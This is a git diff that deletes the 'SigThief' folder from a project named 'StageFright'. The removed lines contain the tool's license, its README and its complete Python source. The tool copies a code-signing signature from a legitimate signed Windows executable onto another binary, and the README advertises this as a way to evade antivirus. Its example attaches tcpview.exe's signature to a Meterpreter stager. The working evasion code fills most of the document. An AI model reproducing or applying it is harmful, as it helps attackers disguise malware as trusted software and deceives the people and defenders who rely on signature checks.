Delete StageFright/StageFright/StageFright/Resources/SigThief directory

StageFright/StageFright/StageFright/Resources/SigThief/LICENSE

@@ -1,29 +0,0 @@
-BSD 3-Clause License
-
-Copyright (c) 2017, Josh Pitts
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-  list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-  this list of conditions and the following disclaimer in the documentation
-  and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-  contributors may be used to endorse or promote products derived from
-  this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

StageFright/StageFright/StageFright/Resources/SigThief/README.md

@@ -1,93 +0,0 @@
-# SigThief
-
-New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
-
-Stable tier will have it End of Month August 2021
-
----
-Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
-https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
-
-https://twitter.com/subTee/status/912769644473098240
-![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
-
-## For security professionals only...
-
-## What is this?
-
-I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
-
-So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
-
-In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
-
-Of course it's **not a valid signature** and that's the point!
-
-I look forward to hearing about your results!
-
-
-## How to use
-
-### Usage
-```
-Usage: sigthief.py [options]
-
-Options:
-  -h, --help            show this help message and exit
-  -i FILE, --file=FILE  input file
-  -r, --rip             rip signature off inputfile
-  -a, --add             add signautre to targetfile
-  -o OUTPUTFILE, --output=OUTPUTFILE
-                        output file
-  -s SIGFILE, --sig=SIGFILE
-                        binary signature from disk
-  -t TARGETFILE, --target=TARGETFILE
-                        file to append signature too
-  -c, --checksig        file to check if signed; does not verify signature
-  -T, --truncate        truncate signature (i.e. remove sig)
-```
-
-### Take a Signature from a binary and add it to another binary
-```
-$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
-Output file: /tmp/msftesting_tcpview.exe
-Signature appended. 
-FIN.
-```
-
-### Save Signature to disk for use later
-```
-$ ./sigthief.py -i tcpview.exe -r                                                        
-Ripping signature to file!
-Output file: tcpview.exe_sig
-Signature ripped. 
-FIN.
-
-```
-
-### Use the ripped signature
-```
-$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
-Output file: x86_meterpreter_stager.exe_signed
-Signature appended. 
-FIN.
-
-```
-
-### Truncate (remove) signature
-This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
-
-```
-$ ./sigthief.py -i tcpview.exe -T    
-Inputfile is signed!
-Output file: tcpview.exe_nosig
-Overwriting certificate table pointer and truncating binary
-Signature removed. 
-FIN.
-```
-
-### Check if there is a signature (does not check validity)
-```
-$ ./sigthief.py -i tcpview.exe -c
-Inputfile is signed!
-```

StageFright/StageFright/StageFright/Resources/SigThief/sigthief.py

@@ -1,269 +0,0 @@
-#!/usr/bin/env python3
-# LICENSE: BSD-3
-# Copyright: Josh Pitts @midnite_runr
-
-import sys
-import struct
-import shutil
-import io
-from optparse import OptionParser
-
-
-def gather_file_info_win(binary):
-        """
-        Borrowed from BDF...
-        I could just skip to certLOC... *shrug*
-        """
-        flItms = {}
-        binary = open(binary, 'rb')
-        binary.seek(int('3C', 16))
-        flItms['buffer'] = 0
-        flItms['JMPtoCodeAddress'] = 0
-        flItms['dis_frm_pehdrs_sectble'] = 248
-        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
-        # Start of COFF
-        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
-        binary.seek(flItms['COFF_Start'])
-        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
-        binary.seek(flItms['COFF_Start'] + 2, 0)
-        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
-        binary.seek(flItms['COFF_Start'] + 16, 0)
-        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
-        #End of COFF
-        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
-
-        #if flItms['SizeOfOptionalHeader']:
-            #Begin Standard Fields section of Optional Header
-        binary.seek(flItms['OptionalHeader_start'])
-        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
-        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
-        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
-        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
-        flItms['SizeOfUninitializedData'] = struct.unpack("<I",
-                                                               binary.read(4))[0]
-        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
-        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
-        if flItms['Magic'] != 0x20B:
-            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
-        # End Standard Fields section of Optional Header
-        # Begin Windows-Specific Fields of Optional Header
-        if flItms['Magic'] == 0x20B:
-            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
-        else:
-            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
-                                                                   binary.read(2))[0]
-        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
-                                                                   binary.read(2))[0]
-        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['SizeOfImageLoc'] = binary.tell()
-        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
-        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
-        if flItms['Magic'] == 0x20B:
-            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
-            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
-            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
-            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
-
-        else:
-            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
-            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
-            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
-            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
-        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
-        # End Windows-Specific Fields of Optional Header
-        # Begin Data Directories of Optional Header
-        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
-        #ImportTable SIZE|LOC
-        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
-        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
-        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
-        flItms['CertTableLOC'] = binary.tell()
-        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
-        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
-        binary.close()
-        return flItms
-
-
-def copyCert(exe):
-    flItms = gather_file_info_win(exe)
-
-    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
-        # not signed
-        print("Input file Not signed!")
-        sys.exit(-1)
-
-    with open(exe, 'rb') as f:
-        f.seek(flItms['CertLOC'], 0)
-        cert = f.read(flItms['CertSize'])
-    return cert
-
-
-def writeCert(cert, exe, output):
-    flItms = gather_file_info_win(exe)
-    
-    if not output: 
-        output = output = str(exe) + "_signed"
-
-    shutil.copy2(exe, output)
-    
-    print("Output file: {0}".format(output))
-
-    with open(exe, 'rb') as g:
-        with open(output, 'wb') as f:
-            f.write(g.read())
-            f.seek(0)
-            f.seek(flItms['CertTableLOC'], 0)
-            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
-            f.write(struct.pack("<I", len(cert)))
-            f.seek(0, io.SEEK_END)
-            f.write(cert)
-
-    print("Signature appended. \nFIN.")
-
-
-def outputCert(exe, output):
-    cert = copyCert(exe)
-    if not output:
-        output = str(exe) + "_sig"
-
-    print("Output file: {0}".format(output))
-
-    open(output, 'wb').write(cert)
-
-    print("Signature ripped. \nFIN.")
-
-
-def check_sig(exe):
-    flItms = gather_file_info_win(exe)
- 
-    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
-        # not signed
-        print("Inputfile Not signed!")
-    else:
-        print("Inputfile is signed!")
-
-
-def truncate(exe, output):
-    flItms = gather_file_info_win(exe)
- 
-    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
-        # not signed
-        print("Inputfile Not signed!")
-        sys.exit(-1)
-    else:
-        print( "Inputfile is signed!")
-
-    if not output:
-        output = str(exe) + "_nosig"
-
-    print("Output file: {0}".format(output))
-
-    shutil.copy2(exe, output)
-
-    with open(output, "r+b") as binary:
-        print('Overwriting certificate table pointer and truncating binary')
-        binary.seek(-flItms['CertSize'], io.SEEK_END)
-        binary.truncate()
-        binary.seek(flItms['CertTableLOC'], 0)
-        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
-
-    print("Signature removed. \nFIN.")
-
-
-def signfile(exe, sigfile, output):
-    flItms = gather_file_info_win(exe)
-    
-    cert = open(sigfile, 'rb').read()
-
-    if not output: 
-        output = output = str(exe) + "_signed"
-
-    shutil.copy2(exe, output)
-    
-    print("Output file: {0}".format(output))
-    
-    with open(exe, 'rb') as g:
-        with open(output, 'wb') as f:
-            f.write(g.read())
-            f.seek(0)
-            f.seek(flItms['CertTableLOC'], 0)
-            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
-            f.write(struct.pack("<I", len(cert)))
-            f.seek(0, io.SEEK_END)
-            f.write(cert)
-    print("Signature appended. \nFIN.")
-
-
-if __name__ == "__main__":
-    usage = 'usage: %prog [options]'
-    print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
-    parser = OptionParser()
-    parser.add_option("-i", "--file", dest="inputfile", 
-                  help="input file", metavar="FILE")
-    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
-                  help='rip signature off inputfile')
-    parser.add_option('-a', '--add', dest='addsig', action='store_true',
-                  help='add signautre to targetfile')
-    parser.add_option('-o', '--output', dest='outputfile',
-                  help='output file')
-    parser.add_option('-s', '--sig', dest='sigfile',
-                  help='binary signature from disk')
-    parser.add_option('-t', '--target', dest='targetfile',
-                  help='file to append signature to')
-    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
-                  help='file to check if signed; does not verify signature')
-    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
-                  help='truncate signature (i.e. remove sig)')
-    (options, args) = parser.parse_args()
-    
-    # rip signature
-    # inputfile and rip to outputfile
-    if options.inputfile and options.ripsig:
-        print("Ripping signature to file!")
-        outputCert(options.inputfile, options.outputfile)
-        sys.exit()    
-
-    # copy from one to another
-    # inputfile and rip to targetfile to outputfile    
-    if options.inputfile and options.targetfile:
-        cert = copyCert(options.inputfile)
-        writeCert(cert, options.targetfile, options.outputfile)
-        sys.exit()
-
-    # check signature
-    # inputfile 
-    if options.inputfile and options.checksig:
-        check_sig(options.inputfile) 
-        sys.exit()
-
-    # add sig to target file
-    if options.targetfile and options.sigfile:
-        signfile(options.targetfile, options.sigfile, options.outputfile)
-        sys.exit()
-        
-    # truncate
-    if options.inputfile and options.truncate:
-        truncate(options.inputfile, options.outputfile)
-        sys.exit()
-
-    parser.print_help()
-    parser.error("You must do something!")
-